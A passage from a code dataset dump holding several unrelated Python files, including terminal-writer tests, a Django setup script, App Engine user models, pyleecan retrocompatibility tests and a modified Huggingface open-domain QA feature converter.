finally: \n py.magic.revert(terminalwriter, 'get_terminal_width')\n\ndef test_terminalwriter_defaultwidth_80():\n py.magic.patch(terminalwriter, '_getdimensions', lambda: 0/0)\n try:\n tw = py.io.TerminalWriter() \n assert tw.fullwidth == os.environ.get('COLUMNS', 80)-1\n finally: \n py.magic.revert(terminalwriter, '_getdimensions')\n \n \ndef test_terminalwriter_default_instantiation():\n tw = py.io.TerminalWriter(stringio=True)\n assert hasattr(tw, 'stringio')\n\nclass BaseTests:\n def test_line(self): \n tw = self.getwriter()\n tw.line(\"hello\")\n l = self.getlines()\n assert len(l) == 1\n assert l[0] == \"hello\\n\"\n\n def test_sep_no_title(self):\n tw = self.getwriter()\n tw.sep(\"-\", fullwidth=60) \n l = self.getlines()\n assert len(l) == 1\n assert l[0] == \"-\" * 60 + \"\\n\"\n\n def test_sep_with_title(self):\n tw = self.getwriter()\n tw.sep(\"-\", \"hello\", fullwidth=60) \n l = self.getlines()\n assert len(l) == 1\n assert l[0] == \"-\" * 26 + \" hello \" + \"-\" * 27 + \"\\n\"\n\n def test__escaped(self):\n tw = self.getwriter()\n text2 = tw._escaped(\"hello\", (31))\n assert text2.find(\"hello\") != -1\n\n def test_markup(self):\n tw = self.getwriter()\n for bold in (True, False):\n for color in (\"red\", \"green\"):\n text2 = tw.markup(\"hello\", **{color: True, 'bold': bold})\n assert text2.find(\"hello\") != -1\n py.test.raises(ValueError, \"tw.markup('x', wronkw=3)\")\n py.test.raises(ValueError, \"tw.markup('x', wronkw=0)\")\n\n def test_line_write_markup(self):\n tw = self.getwriter()\n tw.hasmarkup = True\n tw.line(\"x\", bold=True)\n tw.write(\"x\\n\", red=True)\n l = self.getlines()\n assert len(l[0]) > 2, l\n assert len(l[1]) > 2, l\n\n def test_attr_fullwidth(self):\n tw = self.getwriter()\n tw.sep(\"-\", \"hello\", fullwidth=70)\n tw.fullwidth = 70\n tw.sep(\"-\", \"hello\")\n l = self.getlines()\n assert len(l[0]) == len(l[1])\n\nclass TestStringIO(BaseTests):\n def getwriter(self):\n self.tw = py.io.TerminalWriter(stringio=True)\n return self.tw\n def getlines(self):\n io = self.tw.stringio\n io.seek(0)\n return io.readlines()\n\nclass TestCallableFile(BaseTests): \n def getwriter(self):\n self.writes = []\n return py.io.TerminalWriter(self.writes.append)\n\n def getlines(self):\n io = py.std.cStringIO.StringIO()\n io.write(\"\".join(self.writes))\n io.seek(0)\n return io.readlines()\n\ndef test_attr_hasmarkup():\n tw = py.io.TerminalWriter(stringio=True)\n assert not tw.hasmarkup\n tw.hasmarkup = True\n tw.line(\"hello\", bold=True)\n s = tw.stringio.getvalue()\n assert len(s) > len(\"hello\")\n\n \n\n","sub_path":"InvTL/lm_py/py/io/testing/test_terminalwriter.py","file_name":"test_terminalwriter.py","file_ext":"py","file_size_in_byte":3166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"117469761","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n__author__ = 'Christian Karrié '\n\nfrom distutils.core import setup\n\n# Dynamically calculate the version based on ccm.VERSION\nversion_tuple = __import__('tvhm').VERSION\nversion = \".\".join([str(v) for v in version_tuple])\n\nsetup(\n name = 'django-tvhmanager',\n description = 'TVHeadend Manager',\n version = version,\n author = 'Christian Karrie',\n author_email = 'ckarrie@gmail.com',\n url = 'http://ccm.app/',\n packages=['tvhm'],\n)\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"613190849","text":"import webapp2\nfrom google.appengine.ext import ndb\nfrom Preguntas import Pregunta\n\n\nclass Usuario(ndb.Model):\n\n # Nick del usuario\n nick = ndb.StringProperty()\n\n # Nombre del usuario\n name = ndb.StringProperty()\n\n # Apellido del usuario\n surname = ndb.StringProperty()\n\n # Password del usuario\n password = ndb.StringProperty()\n\n # Email del usuario\n email = ndb.StringProperty()\n\n # Usuario activado o no\n #activado = ndb.BooleanProperty()\n\n # rol\n rol = ndb.StringProperty()\n\n # Fecha de registro del usuario\n date = ndb.DateTimeProperty(auto_now_add=True)\n\n \"\"\"\n Funcion que devuelve el id del usuario, tipo Long\n \"\"\"\n def get_id(self):\n return self.key.id()\n\n \"\"\"\n Funcion que devuelve el id como string\n \"\"\"\n def get_id_as_str(self):\n\n return self.key.id().__str__\n\n \"\"\"\n Funcion que devuelve activado\n \n def get_activado(self):\n\n return self.activado.id()\n \"\"\"\n def add_pregunta(self, pregunta):\n\n m = MiPregunta()\n m.id_pregunta=pregunta\n m.id_usuario=self.get_id()\n m.put()\n\n def del_pregunta(self, pregunta):\n m = MiPregunta.query(MiPregunta.id_usuario == self.get_id()).filter(MiPregunta.id_pregunta == pregunta).fetch()[0]\n m.delete()\n\n def pregunta_guardada(self,pregunta):\n m = Mipregunta.query(Mipregunta.id_usuario == self.get_id()).filter(Mipregunta.id_pregunta == pregunta).count()\n print(\"Numero de pregunta\" + str(m))\n if m > 0:\n return True\n else:\n return False\n\n def get_preguntas(self):\n preguntas=[]\n mias = MiPregunta.query(MiPregunta.id_usuario==self.get_id())\n for r in mias:\n preguntas.append(pregunta.get_by_id(int(r.id_pregunta)))\n return preguntas\n\n\nclass MiPregunta(ndb.Model):\n\n id_pregunta = ndb.GenericProperty()\n id_usuario = ndb.GenericProperty()\n\n def delete(self):\n self.key.delete()\n\nclass Anonimo(ndb.Model):\n nick = ndb.StringProperty()\n aciertos = ndb.IntegerProperty()\n fallos = ndb.IntegerProperty()\n creado = ndb.DateTimeProperty(auto_now_add = True)\n","sub_path":"Clases/Usuarios.py","file_name":"Usuarios.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"60200932","text":"# -*- coding: utf-8 -*-\n\n\nfrom os.path import isfile, join\n\nimport pytest\nfrom numpy import array_equal\nfrom pyleecan.definitions import DATA_DIR\nfrom pyleecan.Functions.load import load\nfrom pyleecan.Functions.Load.retrocompatibility import is_before_version\nfrom Tests import TEST_DATA_DIR\n\n# 4: OP_matrix convertion (ndarray to object)\nOPM_list = list()\nOPM_list.append( # VarParam of VarLoadCurrent (OP Id/Iq)\n {\n \"ref\": join(\n TEST_DATA_DIR,\n \"Retrocompatibility\",\n \"OP_matrix\",\n \"new\",\n \"test_multi_multi.json\",\n ),\n \"old\": join(\n TEST_DATA_DIR,\n \"Retrocompatibility\",\n \"OP_matrix\",\n \"old\",\n \"test_multi_multi.json\",\n ),\n }\n)\nOPM_list.append( # VarLoadCurrent (I0/Phi0/Tem)\n {\n \"ref\": join(\n TEST_DATA_DIR, \"Retrocompatibility\", \"OP_matrix\", \"new\", \"test_varload.json\"\n ),\n \"old\": join(\n TEST_DATA_DIR, \"Retrocompatibility\", \"OP_matrix\", \"old\", \"test_varload.json\"\n ),\n }\n)\n\n# 3: HoleUD convertion (label update)\nhole_list = list()\nhole_list.append( # WindingCW1L\n {\n \"ref\": join(DATA_DIR, \"Machine\", \"BMW_i3.json\"),\n \"old\": join(TEST_DATA_DIR, \"Retrocompatibility\", \"Label\", \"BMW_i3.json\"),\n }\n)\n\n# VarParam convertion (rename to VarParamSweep)\nvarparam_list = list()\nvarparam_list.append(\n {\n \"ref\": join(\n TEST_DATA_DIR, \"Retrocompatibility\", \"VarParam\", \"VarParam_ref.json\"\n ),\n \"old\": join(\n TEST_DATA_DIR, \"Retrocompatibility\", \"VarParam\", \"VarParam_old.json\"\n ),\n }\n)\n\n# OptiConstraint & OptiDesignVar convertion\nopti_list = list()\nopti_list.append(\n {\n \"ref\": join(\n TEST_DATA_DIR,\n \"Retrocompatibility\",\n \"Optimisation\",\n \"OptiConstraint_and_OptiDesignVar_ref.json\",\n ),\n \"old\": join(\n TEST_DATA_DIR,\n \"Retrocompatibility\",\n \"Optimisation\",\n \"OptiConstraint_and_OptiDesignVar_old.json\",\n ),\n }\n)\n\n# 2: Winding convertion (star of slot)\nwind_list = list()\n# wind_list.append( # WindingSC + WindingDW2L\n# {\n# \"ref\": join(DATA_DIR, \"Machine\", \"SCIM_001.json\"),\n# \"old\": join(TEST_DATA_DIR, \"Retrocompatibility\", \"Winding\", \"SCIM_001.json\"),\n# }\n# )\nwind_list.append( # WindingCW1L\n {\n \"ref\": join(DATA_DIR, \"Machine\", \"SPMSM_002.json\"),\n \"old\": join(TEST_DATA_DIR, \"Retrocompatibility\", \"Winding\", \"SPMSM_002.json\"),\n }\n)\nwind_list.append( # WindingCW2LT\n {\n \"ref\": join(DATA_DIR, \"Machine\", \"SPMSM_015.json\"),\n \"old\": join(TEST_DATA_DIR, \"Retrocompatibility\", \"Winding\", \"SPMSM_015.json\"),\n }\n)\nwind_list.append( # WindingUD\n {\n \"ref\": join(DATA_DIR, \"Machine\", \"SPMSM_020.json\"),\n \"old\": join(TEST_DATA_DIR, \"Retrocompatibility\", \"Winding\", \"SPMSM_020.json\"),\n }\n)\n# wind_list.append( # WindingSC + WindingDW2L\n# {\n# \"ref\": join(DATA_DIR, \"Machine\", \"Tesla_S.json\"),\n# \"old\": join(TEST_DATA_DIR, \"Retrocompatibility\", \"Winding\", \"Tesla_S.json\"),\n# }\n# )\nwind_list.append( # WindingDW1L\n {\n \"ref\": join(DATA_DIR, \"Machine\", \"Toyota_Prius.json\"),\n \"old\": join(\n TEST_DATA_DIR, \"Retrocompatibility\", \"Winding\", \"Toyota_Prius.json\"\n ),\n }\n)\n\n\ndef test_save_OPM_None_retro():\n \"\"\"Check that the OP_matrix convertion works with None\"\"\"\n simu = load(\n join(\n TEST_DATA_DIR,\n \"Retrocompatibility\",\n \"OP_matrix\",\n \"test_OPM_None.json\",\n ),\n )\n assert simu.var_simu.OP_matrix is None\n\n\n@pytest.mark.parametrize(\"file_dict\", OPM_list)\ndef test_save_OPM_retro(file_dict):\n \"\"\"Check that the OP_matrix convertion works\"\"\"\n ref = load(file_dict[\"ref\"])\n old = load(file_dict[\"old\"])\n\n ref_var = ref.get_var_load()\n old_var = old.get_var_load()\n # Datakeeper were added between the 2 versions\n ref_var.datakeeper_list = None\n old_var.datakeeper_list = None\n\n # Check old file is converted to current version\n msg = (\n \"Error for \"\n + ref.name\n + \": \"\n + str(ref_var.compare(old_var, \"var_load\", is_add_value=True))\n )\n assert ref_var == old_var, msg\n\n\n@pytest.mark.parametrize(\"file_dict\", hole_list)\ndef test_save_load_hole_retro(file_dict):\n \"\"\"Check that the HoleUD convertion works\"\"\"\n ref = load(file_dict[\"ref\"])\n old = load(file_dict[\"old\"])\n\n hole_ref = ref.rotor.hole[0]\n hole_old = old.rotor.hole[0]\n\n # Check old file is converted to current version\n msg = \"Error for \" + ref.name + \": \" + str(hole_ref.compare(hole_old, \"hole\"))\n assert hole_ref == hole_old, msg\n\n\n@pytest.mark.parametrize(\"file_dict\", wind_list)\ndef test_save_load_wind_retro(file_dict):\n \"\"\"Check that the winding convertion works (convert to WindingUD instead of Winding)\"\"\"\n ref = load(file_dict[\"ref\"])\n old = load(file_dict[\"old\"])\n\n # Check old file is converted to current version\n if hasattr(ref.rotor, \"winding\"):\n msg = (\n \"Error for \"\n + ref.name\n + \": \"\n + str(ref.rotor.winding.compare(old.rotor.winding, \"rotor.winding\"))\n )\n assert ref.rotor.winding == old.rotor.winding, msg\n\n msg = \"Error for \" + ref.name\n assert ref.stator.winding.p == old.stator.winding.p, msg\n assert ref.stator.winding.qs == old.stator.winding.qs, msg\n assert ref.stator.winding.Ntcoil == old.stator.winding.Ntcoil, msg\n assert array_equal(\n ref.stator.winding.get_connection_mat(),\n -1 * old.stator.winding.get_connection_mat(),\n ) or array_equal(\n ref.stator.winding.get_connection_mat(),\n old.stator.winding.get_connection_mat(),\n ), msg\n\n\n@pytest.mark.parametrize(\"file_dict\", varparam_list)\ndef test_load_varparam(file_dict):\n \"\"\"Check that the VarParam into VarParamSweep convertion works\"\"\"\n ref = load(file_dict[\"ref\"])\n old = load(file_dict[\"old\"])\n\n # Check old file is converted to current version\n msg = \"Error for \" + ref.name + \": VarParam is not converted into VarParamSweep\"\n assert ref.name == old.name, msg\n\n\n@pytest.mark.parametrize(\"file_dict\", opti_list)\ndef test_load_opti(file_dict):\n \"\"\"Check that the OptiConstraint & OptiDesignVar convertion works\"\"\"\n ref = load(file_dict[\"ref\"])\n old = load(file_dict[\"old\"])\n\n msg = \"Error for OptiConstraint, get_variable is not converted into keeper\"\n for ii in range(len(old.problem.constraint)):\n if hasattr(old.problem.constraint[ii], \"keeper\"):\n assert (\n old.problem.constraint[ii]._keeper_str\n == ref.problem.constraint[ii]._keeper_str\n )\n else:\n assert False, msg\n\n msg = \"Error for OptiDesignVar, not converted into OptiDesignVarInterval\"\n for ii, designvar in enumerate(old.problem.design_var):\n assert isinstance(designvar, type(ref.problem.design_var[ii])), msg\n\n\ndef test_before_version():\n \"\"\"Check that we can detect previous version\"\"\"\n assert is_before_version(\"1.2.3\", \"1.2.1\")\n assert is_before_version(\"1.2.3\", \"1.1.3\")\n assert is_before_version(\"1.2.3\", \"0.2.3\")\n assert not is_before_version(\"1.2.3\", \"2.2.3\")\n assert not is_before_version(\"1.2.3\", \"1.3.0\")\n assert not is_before_version(\"1.2.3\", \"1.2.4\")\n assert not is_before_version(\"1.2.3\", \"1.2.3\")\n assert not is_before_version(\"1.2.3\", \"1.2.3.2\")\n assert is_before_version(\"1.2.3.2\", \"1.2.3\")\n\n\nif __name__ == \"__main__\":\n test_save_OPM_None_retro()\n for file_dict in OPM_list:\n test_save_OPM_retro(file_dict)\n\n # for file_dict in hole_list:\n # test_save_load_hole_retro(file_dict)\n\n # for file_dict in wind_list:\n # test_save_load_wind_retro(file_dict)\n print(\"Done\")\n","sub_path":"Tests/Functions/test_retrocompatibility.py","file_name":"test_retrocompatibility.py","file_ext":"py","file_size_in_byte":7908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"314139813","text":"# Copyright (c) 2021-present, Data-driven Intelligent System Research Center (DIRECT), National Institute of Information and Communications Technology (NICT). (Modifications for BERTAC)\n\"\"\" Modified from squad.py in the original Huggingface transformers \n for open-domain QA experiments using BERTAC\nFollowing functions and classes have been added or modified. \n\nfunctions:\n def openqa_convert_example_to_features_for_cnn:\n def openqa_convert_example_to_features_init:\n def openqa_convert_example_to_features_init_for_cnn:\n def openqa_convert_examples_to_features:\nclasses: \n class OpenQAExample(object):\n class OpenQAFeatures(object):\n class OpenQAFeatures_for_cnn(object):\n class OpenQASelectorResult(object):\n class OpenQAResult(object):\n\nSee \"# added by Jong-Hoon Oh\" or # added/modified by Jong-Hoon Oh\" for the places of the modification\n\"\"\"\n\nimport json\nimport logging\nimport os\nimport sys\nimport io\nfrom functools import partial\nfrom multiprocessing import Pool, cpu_count\n\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom ...file_utils import is_tf_available, is_torch_available\nfrom ...tokenization_albert import whitespace_tokenize\nfrom .utils import DataProcessor\n\n\nif is_torch_available():\n import torch\n from torch.utils.data import TensorDataset\n\nif is_tf_available():\n import tensorflow as tf\n\nlogger = logging.getLogger(__name__)\nsys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')\n\ndef _improve_answer_span(doc_tokens, input_start, input_end, tokenizer, orig_answer_text):\n \"\"\"Returns tokenized answer spans that better match the annotated answer.\"\"\"\n tok_answer_text = \" \".join(tokenizer.tokenize(orig_answer_text))\n\n for new_start in range(input_start, input_end + 1):\n for new_end in range(input_end, new_start - 1, -1):\n text_span = \" \".join(doc_tokens[new_start : (new_end + 1)])\n if text_span == tok_answer_text:\n return (new_start, new_end)\n\n return (input_start, input_end)\n\n\ndef _check_is_max_context(doc_spans, cur_span_index, position):\n \"\"\"Check if this is the 'max context' doc span for the token.\"\"\"\n best_score = None\n best_span_index = None\n for (span_index, doc_span) in enumerate(doc_spans):\n end = doc_span.start + doc_span.length - 1\n if position < doc_span.start:\n continue\n if position > end:\n continue\n num_left_context = position - doc_span.start\n num_right_context = end - position\n score = min(num_left_context, num_right_context) + 0.01 * doc_span.length\n if best_score is None or score > best_score:\n best_score = score\n best_span_index = span_index\n\n return cur_span_index == best_span_index\n\n\ndef _new_check_is_max_context(doc_spans, cur_span_index, position):\n \"\"\"Check if this is the 'max context' doc span for the token.\"\"\"\n best_score = None\n best_span_index = None\n for (span_index, doc_span) in enumerate(doc_spans):\n end = doc_span[\"start\"] + doc_span[\"length\"] - 1\n if position < doc_span[\"start\"]:\n continue\n if position > end:\n continue\n num_left_context = position - doc_span[\"start\"]\n num_right_context = end - position\n score = min(num_left_context, num_right_context) + 0.01 * doc_span[\"length\"]\n if best_score is None or score > best_score:\n best_score = score\n best_span_index = span_index\n\n return cur_span_index == best_span_index\n\n\ndef _is_whitespace(c):\n if c == \" \" or c == \"\\t\" or c == \"\\r\" or c == \"\\n\" or ord(c) == 0x202F:\n return True\n return False\n\n# added/modified by Jong-Hoon Oh\ndef openqa_convert_example_to_features_for_cnn(example, max_seq_length, doc_stride, max_query_length, is_training):\n features = []\n # qas_id \n qas_id = example.qas_id\n # Let we have one answer_text 'start_position and end_position'\n if is_training and not example.is_impossible:\n # Get start and end position \n start_position = example.start_position\n end_position = example.end_position\n\n # If the answer cannot be found in the text, then skip this example.\n actual_text = \" \".join(example.doc_tokens[start_position : (end_position + 1)])\n cleaned_answer_text = \" \".join(whitespace_tokenize(example.answer_text))\n if actual_text.find(cleaned_answer_text) == -1:\n logger.warning(\"Could not find answer: '%s' vs. '%s'\", actual_text, cleaned_answer_text)\n return []\n\n tok_to_orig_index = []\n orig_to_tok_index = []\n all_doc_tokens = []\n all_doc_tokens_upper = []\n all_q_tokens_upper = []\n for (i, token) in enumerate(example.doc_tokens): # doc tokens (main body's)\n orig_to_tok_index.append(len(all_doc_tokens))\n sub_tokens = tokenizer.tokenize(token)\n for sub_token in sub_tokens:\n tok_to_orig_index.append(i)\n all_doc_tokens.append(sub_token)\n\n for (i, token) in enumerate(example.npm_doc_tokens): # npm doc tokens (input to CNN, pid part)\n sub_tokens_npm = tokenizer.tokenize_for_cnn(token) # should be input to CNN\n for sub_token in sub_tokens_npm:\n all_doc_tokens_upper.append(sub_token)\n\n for (i, token) in enumerate(example.npm_q_tokens): # npm doc tokens (input to CNN, qid part)\n sub_tokens_npm = tokenizer.tokenize_for_cnn(token) # should be input to CNN\n for sub_token in sub_tokens_npm:\n all_q_tokens_upper.append(sub_token)\n\n if is_training and not example.is_impossible:\n tok_start_position = orig_to_tok_index[example.start_position]\n if example.end_position < len(example.doc_tokens) - 1:\n tok_end_position = orig_to_tok_index[example.end_position + 1] - 1\n else:\n tok_end_position = len(all_doc_tokens) - 1\n\n (tok_start_position, tok_end_position) = _improve_answer_span(\n all_doc_tokens, tok_start_position, tok_end_position, tokenizer, example.answer_text\n )\n\n spans = []\n\n # added/modified by Jong-Hoon Oh\n # : modification for query\n # : encode_for_cnn for single input (i.e., question) does not convert qstr into cnn_qid\n truncated_query, truncated_query_tokens, truncated_query_tokens_upper = tokenizer.encode_for_cnn(example.question_text, cnn_stoi, add_special_tokens=False, max_length=max_query_length)\n sequence_added_tokens = (\n tokenizer.max_len - tokenizer.max_len_single_sentence + 1\n if \"roberta\" in str(type(tokenizer))\n else tokenizer.max_len - tokenizer.max_len_single_sentence\n )\n sequence_pair_added_tokens = tokenizer.max_len - tokenizer.max_len_sentences_pair\n\n span_doc_tokens = all_doc_tokens\n span_doc_tokens_upper = all_doc_tokens_upper\n span_q_tokens_upper = all_q_tokens_upper\n sidx = 0\n while len(spans) * doc_stride < len(all_doc_tokens):\n\n # added/modified by Jong-Hoon Oh\n # : modification for docs. (truncated_query_aids and truncated_query_tokens are also given)\n encoded_dict = tokenizer.encode_plus_for_cnn(\n truncated_query if tokenizer.padding_side == \"right\" else span_doc_tokens,\n truncated_query_tokens if tokenizer.padding_side == \"right\" else span_doc_tokens,\n span_q_tokens_upper if tokenizer.padding_side == \"right\" else span_doc_tokens_upper, # converson for CNN input: qid\n cnn_stoi,\n span_doc_tokens if tokenizer.padding_side == \"right\" else truncated_query,\n span_doc_tokens if tokenizer.padding_side == \"right\" else truncated_query_tokens,\n span_doc_tokens_upper if tokenizer.padding_side == \"right\" else span_q_tokens_upper, # conversion for CNN input: pid\n max_length=max_seq_length,\n return_overflowing_tokens=True,\n pad_to_max_length=True,\n stride=max_seq_length - doc_stride - len(truncated_query) - sequence_pair_added_tokens,\n truncation_strategy=\"only_second\" if tokenizer.padding_side == \"right\" else \"only_first\",\n )\n\n paragraph_len = min(\n len(all_doc_tokens) - len(spans) * doc_stride,\n max_seq_length - len(truncated_query) - sequence_pair_added_tokens,\n )\n\n if tokenizer.pad_token_id in encoded_dict[\"input_ids\"]:\n if tokenizer.padding_side == \"right\":\n non_padded_ids = encoded_dict[\"input_ids\"][: encoded_dict[\"input_ids\"].index(tokenizer.pad_token_id)]\n else:\n last_padding_id_position = (\n len(encoded_dict[\"input_ids\"]) - 1 - encoded_dict[\"input_ids\"][::-1].index(tokenizer.pad_token_id)\n )\n non_padded_ids = encoded_dict[\"input_ids\"][last_padding_id_position + 1 :]\n\n else:\n non_padded_ids = encoded_dict[\"input_ids\"]\n\n tokens = tokenizer.convert_ids_to_tokens(non_padded_ids)\n\n token_to_orig_map = {}\n for i in range(paragraph_len):\n index = len(truncated_query) + sequence_added_tokens + i if tokenizer.padding_side == \"right\" else i\n token_to_orig_map[index] = tok_to_orig_index[len(spans) * doc_stride + i]\n\n encoded_dict[\"qas_id\"] = qas_id\n encoded_dict[\"paragraph_len\"] = paragraph_len\n encoded_dict[\"tokens\"] = tokens\n encoded_dict[\"token_to_orig_map\"] = token_to_orig_map\n encoded_dict[\"truncated_query_with_special_tokens_length\"] = len(truncated_query) + sequence_added_tokens\n encoded_dict[\"token_is_max_context\"] = {}\n encoded_dict[\"start\"] = len(spans) * doc_stride\n encoded_dict[\"length\"] = paragraph_len\n\n spans.append(encoded_dict)\n\n if \"overflowing_tokens\" not in encoded_dict:\n break\n\n span_doc_tokens = encoded_dict[\"overflowing_tokens\"]\n span_doc_tokens_upper = encoded_dict[\"overflowing_tokens_upper\"]\n sidx += 1\n\n for doc_span_index in range(len(spans)):\n for j in range(spans[doc_span_index][\"paragraph_len\"]):\n is_max_context = _new_check_is_max_context(spans, doc_span_index, doc_span_index * doc_stride + j)\n index = (\n j\n if tokenizer.padding_side == \"left\"\n else spans[doc_span_index][\"truncated_query_with_special_tokens_length\"] + j\n )\n spans[doc_span_index][\"token_is_max_context\"][index] = is_max_context\n\n for span in spans:\n # Identify the position of the CLS token\n cls_index = span[\"input_ids\"].index(tokenizer.cls_token_id)\n\n # Original TF implem also keep the classification token (set to 0) (not sure why...)\n p_mask = np.array(span[\"token_type_ids\"])\n\n p_mask = np.minimum(p_mask, 1)\n\n if tokenizer.padding_side == \"right\":\n # Limit positive values to one\n p_mask = 1 - p_mask\n\n p_mask[np.where(np.array(span[\"input_ids\"]) == tokenizer.sep_token_id)[0]] = 1\n\n # Set the CLS index to '0'\n p_mask[cls_index] = 0\n\n span_is_impossible = example.is_impossible\n start_position = 0\n end_position = 0\n\n if is_training and not span_is_impossible:\n # For training, if our document chunk does not contain an annotation\n # we throw it out, since there is nothing to predict.\n # 'span_is_impossible' is the flag for controlling this.\n doc_start = span[\"start\"]\n doc_end = span[\"start\"] + span[\"length\"] - 1\n out_of_span = False\n\n if not (tok_start_position >= doc_start and tok_end_position <= doc_end):\n out_of_span = True\n\n if out_of_span:\n start_position = cls_index\n end_position = cls_index\n span_is_impossible = True\n else:\n if tokenizer.padding_side == \"left\":\n doc_offset = 0\n else:\n doc_offset = len(truncated_query) + sequence_added_tokens\n\n start_position = tok_start_position - doc_start + doc_offset\n end_position = tok_end_position - doc_start + doc_offset\n\n\n # added/modified by Jong-Hoon Oh\n features.append(\n OpenQAFeatures_for_cnn(\n span[\"input_ids\"],\n span[\"input_qids\"],\n span[\"input_pids\"],\n span[\"qmasks\"],\n span[\"pmasks\"],\n span[\"attention_mask\"],\n span[\"token_type_ids\"],\n cls_index,\n p_mask.tolist(),\n example_index=0, # Don't set unique_id and example_index here. \n unique_id=0,\n paragraph_len=span[\"paragraph_len\"],\n token_is_max_context=span[\"token_is_max_context\"],\n tokens=span[\"tokens\"],\n token_to_orig_map=span[\"token_to_orig_map\"],\n start_position=start_position,\n end_position=end_position,\n is_impossible=span_is_impossible,\n qas_id=qas_id,\n )\n )\n return features\n\n\n# added/modified by Jong-Hoon Oh\ndef openqa_convert_example_to_features_init(tokenizer_for_convert):\n global tokenizer\n tokenizer = tokenizer_for_convert\n\n# added/modified by Jong-Hoon Oh\ndef openqa_convert_example_to_features_init_for_cnn(tokenizer_for_convert, cnn_stoi_for_convert):\n global tokenizer\n tokenizer = tokenizer_for_convert\n global cnn_stoi\n cnn_stoi = cnn_stoi_for_convert\n\n# added/modified by Jong-Hoon Oh\ndef openqa_convert_examples_to_features(\n examples, tokenizer, cnn_stoi, max_seq_length, doc_stride, max_query_length, is_training, return_dataset=False, threads=1\n):\n \"\"\"\n Converts a list of examples into a list of features that can be directly given as input to a model.\n It is model-dependant and takes advantage of many of the tokenizer's features to create the model's inputs.\n\n Args:\n examples: list of :class:`~transformers.data.processors.openqa.OpenQAExample`\n tokenizer: an instance of a child of :class:`~transformers.PreTrainedTokenizer`\n cnn_stoi: mapping table from string to index for the CNN vocab.\n max_seq_length: The maximum sequence length of the inputs.\n doc_stride: The stride used when the context is too large and is split across several features.\n max_query_length: The maximum length of the query.\n is_training: whether to create features for model evaluation or model training.\n return_dataset: Default False. Either 'pt' or 'tf'.\n if 'pt': returns a torch.data.TensorDataset,\n if 'tf': returns a tf.data.Dataset\n threads: multiple processing threadsa-smi\n\n\n Returns:\n list of :class:`~transformers.data.processors.openqa.OpenQAFeatures`\n\n Example::\n\n processor = OpenQAV2Processor()\n examples = processor.get_dev_examples(data_dir)\n\n features = openqa_convert_examples_to_features(\n examples=examples,\n tokenizer=tokenizer,\n max_seq_length=args.max_seq_length,\n doc_stride=args.doc_stride,\n max_query_length=args.max_query_length,\n is_training=not evaluate,\n )\n \"\"\"\n\n # Defining helper methods\n # 'openqa_convert_example_to_features' convert string to ids of vocab\n features = []\n threads = min(threads, cpu_count())\n with Pool(threads, initializer=openqa_convert_example_to_features_init_for_cnn, initargs=(tokenizer,cnn_stoi, )) as p:\n annotate_ = partial(\n openqa_convert_example_to_features_for_cnn,\n max_seq_length=max_seq_length,\n doc_stride=doc_stride,\n max_query_length=max_query_length,\n is_training=is_training,\n )\n features = list(\n tqdm(\n p.imap(annotate_, examples, chunksize=32),\n total=len(examples),\n desc=\"convert openqa examples to features\",\n )\n )\n new_features = []\n unique_id = 1000000000\n example_index = 0\n # HERE ASSIGN EXAMPLE IDS\n for example_features in tqdm(features, total=len(features), desc=\"add example index and unique id\"):\n if not example_features:\n continue\n for example_feature in example_features:\n example_feature.example_index = example_index\n example_feature.unique_id = unique_id\n new_features.append(example_feature)\n unique_id += 1\n example_index += 1\n features = new_features\n del new_features\n if return_dataset == \"pt\": # pytorch type (this is the main)\n if not is_torch_available():\n raise RuntimeError(\"PyTorch must be installed to return a PyTorch dataset.\")\n\n qlength = max_query_length\n doc_length = 300\n\n # Convert to Tensors and build dataset\n all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)\n all_input_qids = torch.tensor([f.input_qids[:qlength] for f in features], dtype=torch.long) # added by Jong-Hoon Oh\n all_input_pids = torch.tensor([f.input_pids[:doc_length] for f in features], dtype=torch.long) # added by Jong-Hoon Oh\n all_attention_masks = torch.tensor([f.attention_mask for f in features], dtype=torch.long)\n all_token_type_ids = torch.tensor([f.token_type_ids for f in features], dtype=torch.long)\n all_labels = torch.tensor([1-int(f.is_impossible) for f in features], dtype=torch.long)\n # Convert to Tensors and build dataset\n possible_input_ids = torch.tensor([f.input_ids for f in features if not f.is_impossible], dtype=torch.long)\n possible_input_qids = torch.tensor([f.input_qids[:qlength] for f in features if not f.is_impossible], dtype=torch.long) # added by Jong-Hoon Oh\n possible_input_pids = torch.tensor([f.input_pids[:doc_length] for f in features if not f.is_impossible], dtype=torch.long) # added by Jong-Hoon Oh\n possible_attention_masks = torch.tensor([f.attention_mask for f in features if not f.is_impossible], dtype=torch.long)\n possible_token_type_ids = torch.tensor([f.token_type_ids for f in features if not f.is_impossible], dtype=torch.long)\n possible_labels = torch.tensor([1 for f in features if not f.is_impossible], dtype=torch.long)\n\n if not is_training:\n all_example_index = torch.arange(all_input_ids.size(0), dtype=torch.long)\n dataset = TensorDataset(\n all_input_ids, all_input_qids, all_input_pids, all_attention_masks, all_token_type_ids, all_example_index, all_labels\n ) # added/modified by Jong-Hoon Oh\n possible_example_index = torch.arange(possible_input_ids.size(0), dtype=torch.long)\n possible_dataset = TensorDataset(\n possible_input_ids, possible_input_qids, possible_input_pids, possible_attention_masks, possible_token_type_ids, possible_example_index, possible_labels\n ) \n else:\n all_start_positions = torch.tensor([f.start_position for f in features], dtype=torch.long)\n all_end_positions = torch.tensor([f.end_position for f in features], dtype=torch.long)\n # added/modified by Jong-Hoon Oh\n possible_start_positions = torch.tensor([f.start_position for f in features if not f.is_impossible], dtype=torch.long)\n possible_end_positions = torch.tensor([f.end_position for f in features if not f.is_impossible], dtype=torch.long)\n\n dataset = TensorDataset(\n all_input_ids,\n all_input_qids, # added by Jong-Hoon Oh\n all_input_pids, # added by Jong-Hoon Oh\n all_attention_masks,\n all_token_type_ids,\n all_start_positions,\n all_end_positions,\n all_labels,\n )\n possible_dataset = TensorDataset(\n possible_input_ids,\n possible_input_qids, # added by Jong-Hoon Oh \n 